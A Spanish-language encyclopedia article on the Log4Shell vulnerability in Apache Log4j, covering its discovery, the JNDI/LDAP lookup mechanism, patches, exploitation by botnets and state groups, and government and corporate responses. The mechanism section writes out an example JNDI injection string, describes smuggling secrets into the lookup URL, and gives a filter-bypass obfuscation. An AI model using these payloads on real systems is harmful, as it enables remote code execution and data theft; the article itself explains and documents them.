Log4Shell ( CVE-2021-44228 ) es una vulnerabilidad reportada en noviembre de 2021 en Log4j , un popular marco de registro de Java , que implica la ejecución de código arbitrario y se explota como una vulnerabilidad de día cero . [ 2 ] [ 3 ] La vulnerabilidad había existido sin ser detectada desde 2013 y fue revelada de forma privada a la Apache Software Foundation , de la cual Log4j es un proyecto, por Chen Zhaojun del equipo de seguridad de Alibaba Cloud el 24 de noviembre de 2021. [ 4 ]
Antes de que se publicara un identificador CVE oficial el 10 de diciembre de 2021, la vulnerabilidad circuló con el nombre "Log4Shell", dado por Free Wortley del equipo LunaSec, que se utilizó inicialmente para rastrear el problema en línea. [ 2 ] [ 1 ] [ 5 ] [ 6 ] [ 7 ] Apache le otorgó a Log4Shell una calificación de gravedad CVSS de 10, la puntuación más alta disponible. [ 8 ] El exploit era sencillo de ejecutar y se estima que tenía el potencial de afectar a cientos de millones de dispositivos. [ 7 ] [ 9 ]
La vulnerabilidad aprovecha Log4j permitiendo solicitudes a servidores LDAP y JNDI arbitrarios, [ 2 ] [ 10 ] [ 11 ] permitiendo a los atacantes ejecutar código Java arbitrario en un servidor u otra computadora, o filtrar información confidencial. [ 6 ] El equipo de seguridad de Apache ha publicado una lista de proyectos de software afectados . [ 12 ] Los servicios comerciales afectados incluyen Amazon Web Services , [ 13 ] Cloudflare , iCloud , [ 14 ] Minecraft: Java Edition , [ 15 ] Steam , Tencent QQ y muchos otros. [ 10 ] [ 16 ] [ 17 ] Según Wiz y EY , la vulnerabilidad afectó al 93% de los entornos de nube empresariales. [ 18 ]
La revelación de la vulnerabilidad provocó fuertes reacciones entre los expertos en ciberseguridad. La empresa de ciberseguridad Tenable afirmó que la explotación era "la mayor y más crítica vulnerabilidad jamás vista" [ 19 ], Ars Technica la calificó como "posiblemente la vulnerabilidad más grave jamás vista" [ 20 ] y The Washington Post señaló que las descripciones de los profesionales de la seguridad "rozan lo apocalíptico" [ 9 ] .
Fondo
Log4j es un marco de registro de código abierto que permite a los desarrolladores de software registrar datos dentro de sus aplicaciones, e incluso incluir la entrada del usuario. [ 21 ] Se utiliza ampliamente en aplicaciones Java, especialmente en software empresarial. [ 6 ] Escrito originalmente en 2001 por Ceki Gülcü, ahora forma parte de Apache Logging Services, un proyecto de la Apache Software Foundation . [ 22 ] Tom Kellermann, miembro de la Comisión de Ciberseguridad del Presidente Obama , describió Apache como "uno de los pilares fundamentales de un puente que facilita la conexión entre los mundos de las aplicaciones y los entornos informáticos". [ 23 ]
Comportamiento
La Interfaz de Nombres y Directorios de Java (JNDI) permite la búsqueda de objetos Java en tiempo de ejecución del programa, dada una ruta a sus datos. JNDI puede utilizar varias interfaces de directorio, cada una de las cuales proporciona un esquema diferente para la búsqueda de archivos. Entre estas interfaces se encuentra el Protocolo Ligero de Acceso a Directorios (LDAP), un protocolo no específico de Java [ 24 ] que recupera los datos del objeto como una URL desde un servidor apropiado, ya sea local o en cualquier lugar de Internet. [ 25 ]
En la configuración predeterminada, al registrar una cadena, Log4j 2 realiza una sustitución de cadena en expresiones de la forma ${prefix:name}. [ 25 ] Por ejemplo, Text: ${java:version}podría convertirse en Text: Java version 1.7.0_67. [ 26 ] Entre las expresiones reconocidas está ${jndi:<lookup>}; al especificar que la búsqueda sea a través de LDAP, se puede consultar una URL arbitraria y cargarla como datos de objeto Java. ${jndi:ldap://example.com/file}, por ejemplo, cargará datos de esa URL si está conectado a Internet. Al ingresar una cadena que se registra, un atacante puede cargar y ejecutar código malicioso alojado en una URL pública. [ 25 ] Incluso si la ejecución de los datos está deshabilitada, un atacante aún puede recuperar datos, como variables de entorno secretas , colocándolas en la URL, en cuyo caso se sustituirán y se enviarán al servidor del atacante. [ 27 ] [ 28 ] Además de LDAP, otros protocolos de búsqueda JNDI potencialmente explotables incluyen su variante segura LDAPS, Java Remote Method Invocation (RMI), el Domain Name System (DNS) y el Internet Inter-ORB Protocol (IIOP). [ 29 ] [ 30 ]
Debido a que las solicitudes HTTP se registran con frecuencia, un vector de ataque común es colocar la cadena maliciosa en la URL de la solicitud HTTP o en un encabezado HTTP comúnmente registrado , como User-Agent. Las primeras medidas de mitigación incluyeron el bloqueo de cualquier solicitud que contuviera contenido potencialmente malicioso, como ${jndi. [ 31 ] Estas soluciones básicas de coincidencia de cadenas se pueden eludir ofuscando la solicitud: ${${lower:j}ndi, por ejemplo, se convertirá en una búsqueda JNDI después de realizar la operación de minúscula en la letra j. [ 32 ] Incluso si una entrada, como un nombre, no se registra inmediatamente, puede registrarse posteriormente durante el procesamiento interno y ejecutarse su contenido. [ 25 ]
Mitigación
Las correcciones para esta vulnerabilidad se publicaron el 6 de diciembre de 2021, tres días antes de que se publicara la vulnerabilidad, en Log4j versión 2.15.0-rc1. [ 33 ] [ 34 ] [ 35 ] La corrección incluyó restringir los servidores y protocolos que se pueden usar para las búsquedas. Los investigadores descubrieron un error relacionado, CVE-2021-45046, que permite la ejecución de código local o remoto en ciertas configuraciones no predeterminadas y se corrigió en la versión 2.16.0, que deshabilitó todas las funciones que usan JNDI y el soporte para búsquedas de mensajes. [ 36 ] [ 37 ] Se encontraron dos vulnerabilidades más en la biblioteca: un ataque de denegación de servicio , rastreado como CVE-2021-45105 y corregido en 2.17.0; y una vulnerabilidad de ejecución remota de código difícil de explotar , registrada como CVE-2021-44832 y corregida en la versión 2.17.1. [ 38 ] [ 39 ] Para versiones anteriores, org.apache.logging.log4j.core.lookup.JndiLookupes necesario eliminar la clase del classpath para mitigar ambas vulnerabilidades. [ 8 ] [ 36 ] Una solución recomendada inicialmente para versiones anteriores fue establecer la propiedad del sistema log4j2.formatMsgNoLookupsen true, pero este cambio no impide la explotación de CVE-2021-45046 y posteriormente se descubrió que no deshabilitaba las búsquedas de mensajes en ciertos casos. [ 8 ] [ 36 ]
Las versiones más recientes del Entorno de Ejecución de Java (JRE) también mitigan esta vulnerabilidad al bloquear la carga de código remoto de forma predeterminada, aunque aún existen otros vectores de ataque en ciertas aplicaciones. [ 2 ] [ 27 ] [ 40 ] [ 41 ] Se han publicado varios métodos y herramientas que ayudan a detectar versiones vulnerables de Log4j utilizadas en paquetes Java compilados. [ 42 ]
Cuando no ha sido posible aplicar versiones actualizadas, debido a una variedad de limitaciones como la falta de recursos o soluciones administradas por terceros, filtrar el tráfico de red saliente de implementaciones vulnerables ha sido el recurso principal para muchos. [ 43 ] El enfoque es recomendado por NCC Group [ 44 ] y el Centro Nacional de Ciberseguridad (Reino Unido) , [ 45 ] y es un ejemplo de una medida de defensa en profundidad . La efectividad de dicho filtrado se evidencia [ 46 ] mediante experimentos de laboratorio realizados con cortafuegos capaces de interceptar el tráfico de salida con varias versiones total o parcialmente vulnerables de la propia biblioteca y el JRE .
Uso
La vulnerabilidad permite a los hackers obtener el control de dispositivos vulnerables que utilizan Java. [ 7 ] Algunos hackers emplean la vulnerabilidad para usar los dispositivos de las víctimas para la minería de criptomonedas , la creación de botnets , el envío de spam, el establecimiento de puertas traseras y otras actividades ilegales como ataques de ransomware . [ 7 ] [ 9 ] [ 47 ] En los días posteriores a la divulgación de la vulnerabilidad, Check Point observó millones de ataques iniciados por hackers, y algunos investigadores observaron una tasa de más de cien ataques por minuto que finalmente resultaron en intentos de ataque a más del 40 % de las redes empresariales a nivel internacional. [ 7 ] [ 23 ]
Según Matthew Prince , CEO de Cloudflare , la evidencia de explotación o escaneo del exploit se remonta al 1 de diciembre, nueve días antes de que se divulgara públicamente. [ 48 ] Según la empresa de ciberseguridad GreyNoise, varias direcciones IP estaban rastreando sitios web para verificar servidores que tuvieran la vulnerabilidad. [ 49 ] Varias botnets comenzaron a escanear la vulnerabilidad, incluyendo la botnet Muhstik el 10 de diciembre, así como Mirai y Tsunami. [ 7 ] [ 48 ] [ 50 ] Se observó que el grupo de ransomware Conti estaba utilizando la vulnerabilidad el 17 de diciembre. [ 9 ]
Según Check Point, algunos grupos patrocinados por el Estado en China e Irán también utilizaron la vulnerabilidad, pero se desconoce si Israel, Rusia o Estados Unidos la utilizaron antes de que se revelara. [ 9 ] [ 19 ] Check Point afirmó que el 15 de diciembre de 2021, hackers respaldados por Irán intentaron infiltrarse en las redes de empresas e instituciones gubernamentales israelíes. [ 9 ]
Respuesta e impacto
Gubernamental
En Estados Unidos, la directora de la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA), Jen Easterly , describió la explotación como "una de las más graves que he visto en toda mi carrera, si no la más grave", explicando que cientos de millones de dispositivos se vieron afectados y aconsejando a los proveedores que priorizaran las actualizaciones de software. [ 7 ] [ 51 ] [ 47 ] Las agencias civiles contratadas por el gobierno de Estados Unidos tenían hasta el 24 de diciembre de 2021 para parchear las vulnerabilidades. [ 9 ] El 4 de enero, la Comisión Federal de Comercio (FTC) declaró su intención de perseguir a las empresas que no tomen medidas razonables para actualizar el software Log4j usado. [ 52 ] En una reunión en la Casa Blanca, se aclaró la importancia del mantenimiento de seguridad del software de código abierto, a menudo llevado a cabo en gran medida por pocos voluntarios , para la seguridad nacional. Mientras que algunos proyectos de código abierto tienen muchos ojos puestos en ellos , otros no tienen muchas personas o ninguna que garantice su seguridad. [ 53 ] [ 54 ]
La Oficina Federal de Seguridad de la Información (BSI) de Alemania clasificó la vulnerabilidad con el nivel de amenaza más alto de la agencia, calificándola de "situación de amenaza extremadamente crítica" (traducido). También informó que ya se habían producido varios ataques exitosos y que el alcance de la vulnerabilidad seguía siendo difícil de evaluar. [ 55 ] [ 56 ] El Centro Nacional de Ciberseguridad (NCSC) de los Países Bajos comenzó a elaborar una lista permanente de aplicaciones vulnerables. [ 57 ] [ 58 ]
El Centro Canadiense de Ciberseguridad (CCCS) instó a las organizaciones a tomar medidas inmediatas. [ 59 ] La Agencia Tributaria de Canadá cerró temporalmente sus servicios en línea tras enterarse de la vulnerabilidad, mientras que el Gobierno de Quebec cerró casi 4000 de sus sitios web como "medida preventiva". [ 60 ] El Ministerio de Defensa belga sufrió un intento de intrusión y se vio obligado a cerrar parte de su red. [ 61 ]
El Ministerio de Industria y Tecnología de la Información de China suspendió durante seis meses la colaboración con Alibaba Cloud como socio de inteligencia sobre amenazas de ciberseguridad por no haber informado previamente de la vulnerabilidad al gobierno. [ 62 ]
Empresas
Una investigación realizada por Wiz y EY [ 18 ] mostró que el 93% del entorno empresarial en la nube era vulnerable a Log4Shell. El 7% de las cargas de trabajo vulnerables están expuestas a Internet y son propensas a intentos de explotación a gran escala. Según la investigación, diez días después de la divulgación de la vulnerabilidad (20 de diciembre de 2021), solo el 45% de las cargas de trabajo vulnerables se habían parcheado en promedio en entornos en la nube. Los datos en la nube de Amazon, Google y Microsoft se vieron afectados por Log4Shell. [ 9 ] Microsoft pidió a los clientes de Windows y Azure que permanecieran vigilantes después de observar que atacantes patrocinados por estados y ciberdelincuentes sondeaban los sistemas en busca de la vulnerabilidad Log4j 'Log4Shell' durante diciembre de 2021. [ 63 ]
La empresa de gestión de recursos humanos y gestión de personal UKG , una de las mayores del sector, fue blanco de un ataque de ransomware que afectó a grandes empresas. [ 20 ] [ 64 ] UKG afirmó no tener pruebas de que Log4Shell se hubiera utilizado en el incidente, aunque el analista Allan Liska, de la empresa de ciberseguridad Recorded Future, indicó que posiblemente existía una conexión. [ 64 ]
A medida que las empresas más grandes comenzaron a lanzar parches para la vulnerabilidad, el riesgo para las pequeñas empresas aumentó, ya que los piratas informáticos se centraron en objetivos más vulnerables. [ 47 ]
Privacidad
Algunos dispositivos personales conectados a Internet, como televisores inteligentes y cámaras de seguridad, eran vulnerables a la vulnerabilidad. Es posible que algunos programas nunca reciban una actualización debido a que el fabricante ha dejado de ofrecer soporte. [ 9 ]
Análisis
A fecha de 14 de diciembre de 2021 ,Casi la mitad de todas las redes corporativas a nivel mundial fueron sometidas a sondeos activos, y se produjeron más de 60 variantes del exploit en 24 horas. [ 65 ] Check Point Software Technologies describió la situación como una "verdadera ciberpandemia" y caracterizó el potencial de daño como "incalculable". [ 66 ] Varios avisos iniciales exageraron la cantidad de paquetes vulnerables, lo que generó falsos positivos. En particular, el paquete "log4j-api" fue marcado como vulnerable, mientras que, en realidad, una investigación posterior demostró que solo el paquete principal "log4j-core" era vulnerable. Esto fue confirmado tanto en el hilo original del problema [ 67 ] como por investigadores de seguridad externos. [ 68 ]
La revista tecnológica Wired escribió que, a pesar del revuelo previo en torno a múltiples vulnerabilidades, "la vulnerabilidad Log4j ... cumple con las expectativas por diversas razones". [ 19 ] La revista explica que la omnipresencia de Log4j, la dificultad de detección de la vulnerabilidad por parte de los posibles objetivos y la facilidad para transmitir código a las víctimas crearon una "combinación de gravedad, simplicidad y omnipresencia que tiene a la comunidad de seguridad muy preocupada". [ 19 ] Wired también describió las etapas en las que los hackers utilizan Log4Shell: primero, los grupos de criptominería utilizan la vulnerabilidad; luego, los intermediarios de datos venden una "puerta de entrada" a los ciberdelincuentes, quienes finalmente participan en ataques de ransomware, espionaje y destrucción de datos. [ 19 ]
Amit Yoran , director ejecutivo de Tenable y director fundador del Equipo de Preparación para Emergencias Informáticas de los Estados Unidos , declaró: "[Log4Shell] es, con diferencia, la vulnerabilidad más grande y crítica que jamás haya existido", señalando que los ataques sofisticados comenzaron poco después del fallo, y añadió: "También estamos viendo que ya se está utilizando para ataques de ransomware, lo que, de nuevo, debería ser una gran señal de alarma ... También hemos visto informes de atacantes que utilizan Log4Shell para destruir sistemas sin siquiera intentar cobrar un rescate, un comportamiento bastante inusual". [ 19 ] Sean Gallagher, investigador sénior de amenazas de Sophos , dijo: "Sinceramente, la mayor amenaza aquí es que la gente ya ha obtenido acceso y simplemente lo está aprovechando, e incluso si se soluciona el problema, alguien ya está en la red ... Va a estar presente mientras exista Internet". [ 19 ]
Según un informe de Bloomberg News , parte del enojo se dirigió a los desarrolladores de Apache por no haber corregido la vulnerabilidad después de que se hicieran advertencias sobre exploits de amplias clases de software, incluido Log4j, en una conferencia de ciberseguridad de 2016. [ 69 ]
Referencias
- 1 2 Povolny, Steve; McKee, Douglas (10 de diciembre de 2021). "La vulnerabilidad de Log4Shell es el carbón en nuestras reservas para 2021" . McAfee . Recuperado el 12 de diciembre de 2021 .
- 1 2 3 4 Wortley, Free; Thrompson, Chris; Allison, Forrest (9 de diciembre de 2021). "Log4Shell: Se encontró una vulnerabilidad de día cero de RCE en log4j 2, un popular paquete de registro de Java" . LunaSec . Archivado del original el 16 de junio de 2024. Recuperado el 16 de junio de 2024 .
- ↑ "CVE-2021-44228" . Vulnerabilidades y exposiciones comunes . Consultado el 12 de diciembre de 2021 .
- ↑ "Dentro de la carrera por solucionar un fallo de software potencialmente desastroso" . Bloomberg.com . 13 de diciembre de 2021. Consultado el 19 de noviembre de 2024 .
- ↑ "Se ha filtrado en Internet la peor vulnerabilidad de día cero de RCE de Apache Log4j" . Cyber Kendra . 9 de diciembre de 2021. Consultado el 12 de diciembre de 2021 .
- 1 2 3 Newman, Lily Hay (10 de diciembre de 2021) .'Internet está en llamas'" . Wired . ISSN 1059-1028 . Consultado el 12 de diciembre de 2021 .
- 1 2 3 4 5 6 7 Murphy, Hannah (14 de diciembre de 2021). "Los hackers lanzan más de 1,2 millones de ataques a través de la vulnerabilidad Log4J" . Financial Times . Recuperado el 17 de diciembre de 2021 .
- 1 2 3 "Vulnerabilidades de seguridad de Apache Log4j" . Log4j . Apache Software Foundation . Consultado el 12 de diciembre de 2021 .
- 1 2 3 4 5 6 7 8 9 Hunter, Tatum; de Vynck, Gerrit (20 de diciembre de 2021). "La brecha de seguridad 'más grave' de la historia se está desarrollando ahora mismo. Esto es lo que necesitas saber" . The Washington Post .
- 1 2 Mott, Nathaniel (10 de diciembre de 2021). "Innumerables servidores son vulnerables a la vulnerabilidad de día cero de Apache Log4j" . PC Magazine . Recuperado el 12 de diciembre de 2021 .
- ↑ Goodin, Dan (10 de diciembre de 2021). "Una vulnerabilidad de día cero en la omnipresente herramienta Log4j supone una grave amenaza para Internet" . Ars Technica . Consultado el 12 de diciembre de 2021 .
- ↑ "Proyectos Apache afectados por log4j CVE-2021-44228" . 14 de diciembre de 2021.
- ↑ "Actualización para el problema de Apache Log4j2 (CVE-2021-44228)" . Amazon Web Services . 12 de diciembre de 2021. Consultado el 13 de diciembre de 2021 .
- ↑ Lovejoy, Ben (14 de diciembre de 2021). "Apple corrige la vulnerabilidad Log4Shell de iCloud, descrita como la más crítica en una década" . 9to5Mac .
- ↑ "Vulnerabilidad de seguridad en Minecraft: Java Edition" . Minecraft . Mojang Studios . Consultado el 13 de diciembre de 2021 .
- ↑ Goodin, Dan (10 de diciembre de 2021). "Los principales actores de Internet se ven afectados por la vulnerabilidad crítica de día cero de Log4Shell" . ArsTechnica . Consultado el 13 de diciembre de 2021 .
- ↑ Rundle, David Uberti y James (15 de diciembre de 2021). "¿Qué es la vulnerabilidad de Log4j?" . Wall Street Journal – vía www.wsj.com.
- 1 2 "Empresas a mitad de camino en la actualización de Log4Shell | Blog de Wiz" . www.wiz.io. 20 de diciembre de 2021. Consultado el 20 de diciembre de 2021 .
- 1 2 3 4 5 6 7 Barrett, Brian. "La próxima ola de ataques Log4J será brutal" . Wired . ISSN 1059-1028 . Consultado el 17 de diciembre de 2021 .
- 1 2 Goodin, Dan (13 de diciembre de 2021). "Mientras Log4Shell causa estragos, el servicio de nóminas informa de un ataque de ransomware" . Ars Technica . Recuperado el 17 de diciembre de 2021 .
- ↑ Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 de diciembre de 2021). "Otra vulnerabilidad de Apache Log4j se explota activamente en la práctica (CVE-2021-44228)" . Unidad 42. Palo Alto Networks .
- ↑ "Apache Log4j 2" . Apache Software Foundation . Consultado el 12 de diciembre de 2021 .
- 1 2 Byrnes, Jesse (14 de diciembre de 2021). "Hillicon Valley: la vulnerabilidad de Apache hace sonar las alarmas" . TheHill . Recuperado el 17 de diciembre de 2021 .
- ↑ Sermersheim, J. (junio de 2006). Protocolo ligero de acceso a directorios (LDAP): El protocolo . Grupo de trabajo electrónico internacional. doi : 10.17487/RFC4513 . RFC rfc4511 . Consultado el 13 de diciembre de 2021 .
- 1 2 3 4 Graham-Cumming, John (10 de diciembre de 2021). "Dentro de la vulnerabilidad de Log4j2 (CVE-2021-44228)" . El blog de Cloudflare . Recuperado el 13 de diciembre de 2021 .
- ↑ "Búsquedas" . Log4j . Apache Software Foundation . Consultado el 13 de diciembre de 2021 .
- 1 2 Ducklin, Paul (12 de diciembre de 2021). "Log4Shell explicado: cómo funciona, por qué necesitas saberlo y cómo solucionarlo" . Naked Security . Sophos . Recuperado el 12 de diciembre de 2021 .
- ↑ Miessler, Daniel (13 de diciembre de 2021). "La situación de log4j (Log4Shell)" . Aprendizaje no supervisado .
- ↑ Duraishamy, Ranga; Verma, Ashish; Ang, Miguel Carlo (13 de diciembre de 2021). "Aplique ahora el parche para la vulnerabilidad de Apache Log4j llamada Log4Shell, que está siendo explotada activamente" . Trend Micro . Consultado el 14 de diciembre de 2021 .
- ↑ Narang, Satnam (10 de diciembre de 2021). "CVE-2021-44228: Prueba de concepto disponible para una vulnerabilidad crítica de ejecución remota de código en Apache Log4j (Log4Shell)" . Blog de Tenable . Consultado el 14 de diciembre de 2021 .
- ↑ Gabor, Gabriel; Bluehs, Gabriel (10 de diciembre de 2021). "CVE-2021-44228 - Mitigación de la vulnerabilidad de día cero RCE de Log4j" . El blog de Cloudflare . Recuperado el 13 de diciembre de 2021 .
- ↑ Hahad, Mounir (12 de diciembre de 2021). "La vulnerabilidad CVE-2021-44228 de Apache Log4j genera gran preocupación" . Recuperado el 12 de diciembre de 2021 .
- ↑ "Restringir el acceso a LDAP a través de JNDI por rgoers #608" . Log4j . 5 de diciembre de 2021. Recuperado el 12 de diciembre de 2021 a través de GitHub .
- ↑ Berger, Andreas (17 de diciembre de 2021). "¿Qué es Log4Shell? La vulnerabilidad de Log4j explicada (y qué hacer al respecto)" . Noticias de Dynatrace .
Apache publicó un parche para CVE-2021-44228, versión 2.15, el 6 de diciembre. Sin embargo, este parche dejó parte de la vulnerabilidad sin corregir, lo que resultó en CVE-2021-45046 y un segundo parche, versión 2.16, publicado el 13 de diciembre. Apache publicó un tercer parche, versión 2.17, el 17 de diciembre para corregir otra vulnerabilidad relacionada, CVE-2021-45105.
- ↑ Rudis, boB (10 de diciembre de 2021). "Explotación generalizada de la ejecución remota de código crítico en Apache Log4j | Blog de Rapid7" . Rapid7 .
- 1 2 3 "CVE-2021-45046" . Vulnerabilidades y exposiciones comunes . 15 de diciembre de 2021. Recuperado el 15 de diciembre de 2021 .
- ↑ Greig, Jonathan (14 de diciembre de 2021). "Segunda vulnerabilidad de Log4j descubierta, parche ya publicado" . ZDNet . Consultado el 17 de diciembre de 2021 .
- ↑ "CVE-2021-45105" . Base de datos nacional de vulnerabilidades . Consultado el 4 de enero de 2022 .
- ↑ "CVE-2021-44832" . Base de datos nacional de vulnerabilidades . Consultado el 4 de enero de 2022 .
- ↑ "Notas de la versión de Java(TM) SE Development Kit 8, Actualización 121 (JDK 8u121)" . Oracle. 17 de enero de 2017. Consultado el 13 de diciembre de 2021 .
- ↑ "Explotando inyecciones JNDI en Java" . Veracode . 3 de enero de 2019. Consultado el 15 de diciembre de 2021 .
- ↑ "Guía: Cómo detectar y mitigar la vulnerabilidad de Log4Shell (CVE-2021-44228)" . www.lunasec.io . 13 de diciembre de 2021. Consultado el 13 de diciembre de 2021 .
- ↑ "Revisión del evento Log4j de diciembre de 2021" (PDF) . Junta de Revisión de Seguridad Cibernética . 11 de julio de 2022. Consultado el 18 de enero de 2023 .
- ↑ "Recomendaciones y recursos de Apache Log4j para vulnerabilidades de día cero" . Grupo NCC . Consultado el 18 de enero de 2023 .
- ↑ "Alerta: Vulnerabilidades de Apache Log4j" . Centro Nacional de Ciberseguridad (Reino Unido) . 10 de diciembre de 2021. Consultado el 18 de enero de 2023 .
- ↑ "Log4Shell y sus rastros en un filtro de salida de red" . Chaser Systems . 12 de diciembre de 2021. Consultado el 18 de enero de 2023 .
- 1 2 3 Woodyard, Chris. "«Vulnerabilidad crítica»: Las empresas más pequeñas podrían tener más dificultades para impedir que los hackers exploten la vulnerabilidad de Log4j . USA Today . Consultado el 17 de diciembre de 2021 .
- 1 2 Duckett, Chris. "La actividad RCE de Log4j comenzó el 1 de diciembre cuando las botnets comenzaron a usar la vulnerabilidad" . ZDNet . Recuperado el 13 de diciembre de 2021 .
- ↑ "Actividad de explotación para la vulnerabilidad de Apache Log4j - CVE-2021-44228" . Greynoise Research . 10 de diciembre de 2021. Consultado el 14 de diciembre de 2021 .
- ↑ Zugec, Martin (13 de diciembre de 2021). "Aviso técnico: Vulnerabilidad crítica de día cero en Log4j2 explotada en la práctica" . Business Insights . Bitdefender .
- ↑ "Declaración del director de CISA, Easterly, sobre la vulnerabilidad de "Log4j" . CISA . 11 de diciembre de 2021.
- ↑ "La FTC advierte a las empresas que corrijan la vulnerabilidad de seguridad de Log4j" . Comisión Federal de Comercio (FTC). 4 de enero de 2022. Consultado el 6 de enero de 2022 .
- ↑ "Tras Log4j, el software de código abierto se ha convertido en un problema de seguridad nacional" . Gizmodo . Consultado el 16 de enero de 2022 .
- ↑ Greig, Jonathan. "Tras Log4j, la Casa Blanca teme la próxima gran vulnerabilidad de código abierto" . ZDNet . Consultado el 16 de enero de 2022 .
- ↑ Sauerwein, Jörg (12 de diciembre de 2021). "BSI warnt vor Sicherheitslücke" . Tagesschau (en alemán).
- ↑ "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [ Alarma roja: la vulnerabilidad de Log4Shell provoca una situación de amenaza extremadamente crítica ] (Presione soltar) (en alemán). Oficina Federal de Seguridad de la Información . 11 de diciembre de 2021.
- ↑ J. Vaughan-Nichols, Steven (14 de diciembre de 2021). "Log4Shell: Estamos en muchos problemas" . The New Stack .
- ↑ "NCSC-NL/log4shell" . Centro Nacional de Ciberseguridad (Países Bajos) . Consultado el 14 de diciembre de 2021 a través de GitHub.
- ↑ «Declaración del Ministro de Defensa Nacional sobre la vulnerabilidad del Apache y llamamiento a las organizaciones canadienses para que tomen medidas urgentes» . Gobierno de Canadá . 12 de diciembre de 2021. Archivado del original el 20 de diciembre de 2021. Consultado el 12 de diciembre de 2021 .
- ↑ Cabrera, Holly (12 de diciembre de 2021). «Ante las amenazas a la ciberseguridad, Quebec cierra los sitios web del gobierno para su evaluación» . CBC News . Consultado el 12 de diciembre de 2021 .
- ↑ Stupp, Catherine (21 de diciembre de 2021). «Hackers explotan una vulnerabilidad en Log4j en el Ministerio de Defensa belga» . The Wall Street Journal. Archivado del original el 7 de febrero de 2022. Consultado el 14 de febrero de 2022 .
{{cite web}}: CS1 maint: bot: estado de la URL original desconocido ( enlace ) - ↑ "Error en Apache Log4j: el Ministerio de Industria de China retira su apoyo a Alibaba Cloud por no haber informado primero al gobierno sobre la falla" . 22 de diciembre de 2021.
- ↑ Tung, Liam. "Los niveles de ataques a la vulnerabilidad Log4j siguen siendo altos, advierte Microsoft" . ZDNet . Consultado el 5 de enero de 2022 .
- 1 2 Bray, Hiawatha (15 de diciembre de 2021). "Un nuevo fallo de software en 'Log4j' genera preocupación mundial por los ciberataques - The Boston Globe" . The Boston Globe . Consultado el 17 de diciembre de 2021 .
- ↑ "Casi la mitad de las redes analizadas en busca de vulnerabilidades en Log4Shell" . ComputerWeekly . 14 de diciembre de 2021.
- ↑ "Las cifras detrás de una pandemia cibernética: un análisis detallado" . Check Point Software . 13 de diciembre de 2021.
- ↑ "LOG4J2-3201: Limitar los protocolos que JNDI puede usar y restringir LDAP" . Rastreador de incidencias JIRA de Apache . Consultado el 14 de diciembre de 2021 .
- ↑ Menashe, Shachar (13 de diciembre de 2021). "Vulnerabilidad de día cero en Log4Shell: todo lo que necesitas saber" . Blog de JFrog . Consultado el 13 de diciembre de 2021 .
- ↑ "En la carrera por solucionar un fallo de software potencialmente desastroso" . Bloomberg.com . 13 de diciembre de 2021.
Enlaces externos
- Sitio web de Log4j
- Descripción general de Log4Shell en GitHub por parte de NCSC-NL
- Página de vulnerabilidades y exposiciones comunes
- Página de la Base de Datos Nacional de Vulnerabilidades
- Proyectos afectados por cve-2021-44228, por el equipo de seguridad de Apache.
- 2021 en informática
- Explotación de inyecciones
- vulnerabilidades de seguridad informática